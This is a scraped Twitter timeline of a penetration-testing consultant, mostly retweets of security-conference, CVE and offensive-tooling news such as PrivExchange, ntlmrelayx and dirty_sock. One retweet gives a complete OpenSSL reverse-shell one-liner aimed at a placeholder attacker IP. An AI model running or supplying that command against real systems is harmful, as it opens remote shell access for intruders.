Eric Smith
Consultant, Therapist. Persistent SoB. I don't like to lose. Your systems sure do look appetizing.
3,567 Tweets, 767 Following, 3,747 Followers
Tweets
Eric Smith retweeted
GrrCON 16h
If you haven’t been to GrrCON you’re missing out. Old school hacker con without the cliquey drama or endless lines. Do yourself a favor and submit a CFP.
Eric Smith retweeted
JayK Feb 20
Reverse Shell with OpenSSL low-user@pwned#: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s
Eric Smith retweeted
Jacob Baines Feb 21
Follow up to my last MikroTik blog, I found a remote, unauthenticated attacker can proxy crafted UDP/TCP traffic through RouterOS's winbox port. Assigned CVE-2019-3924. In my write up, I bypass the firewall to exploit a LAN target:
Eric Smith retweeted
strandjs Feb 16
Windows subsystem for Linux keeps getting better.. Now, if they could only fix the Sockets issue so tools like Nmap and tcpdump worked..
Eric Smith retweeted
L0phtCrack Feb 17
L0phtCrack 7.1.1 Released - Download is here: Changelog is here
Eric Smith Feb 14
Replying to @vyrus001
Depends if you are the one making it?
Eric Smith retweeted
Dirk-jan Feb 11
If you're using the ACL attack in ntlmrelayx (for example with ), it now saves a restore file that you can feed to aclpwn which can restore the original permissions on the domain object. This and some fixes now in the latest impacket version on GitHub!
Eric Smith retweeted
Ronnie Flathers Feb 12
Oh yeah...coming together very nicely! A little sneak peek of something I'm working on for my talk coming up. Multithreaded Go + Kerberos over UDP = damn this thing is fast 😳
Eric Smith retweeted
BrianHonan Feb 12
Healthcare email fraud: Attack attempts jump 473% over two years
Eric Smith retweeted
Elad Shamir Feb 12
My teammate Chris Moberly () just dropped a beautiful LPE on stock Ubuntu and derivatives - “dirty_sock” Nice work, Chris!
Eric Smith retweeted
Chris Frohoff Feb 12
Looks like another unsafe java deserialization RCE vuln in Adobe ColdFusion
Eric Smith retweeted
Will Feb 6
Sidenote for anyone interested, instructions on using Rubeus as a library and/or running Rubeus through PowerShell are now up on the
Eric Smith Feb 5
Replying to @Niki7a
Don't pull me into this shitstorm. I'm not part of any conference org, specifically BSidesATL.
Eric Smith retweeted
𝖎𝖑𝖑𝖜𝖎𝖑𝖑 Feb 5
Eric Smith retweeted
Jamie Shaw Feb 3
Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques -
Eric Smith retweeted
Zach Grace'-- Feb 3
Although we didn't make use of it at , looks like the Empire telemetry I've been developing worked. Hopefully I can build this out a bit more and we can use this for some objective measurements in next year's competition.
Eric Smith retweeted
b33f Feb 4
I hope defenders have taken note of PrivExchange and kicked their Admins into action. Don't make me come and investigate that meltdown 👻. Check out this post by -> and the execute-assembly evil by ->
Eric Smith retweeted
Andrew Robbins Jan 31
1/n - Here's how can help you determine whether you are vulnerable to PrivExchange by : Find the domain head object in the BloodHound GUI, click the number next to "First Degree Controllers". See whether an Exchange security group is present:
Eric Smith retweeted
Martin Gallo 🇦🇷 💚 Jan 30
For those playing with 's Impacket ntlmrelayx and experiencing delays when relaying to LDAP, just landed an option to avoid enumerating privileges and assume the relayed user has them. Specially handy for when using 's PrivExchange!
Eric Smith retweeted
Red Canary Jan 21
Take a deep dive into ATT&CK tactic TA0008. Join , , , and as we take lessons learned from and apply those detection strategies to find other threats.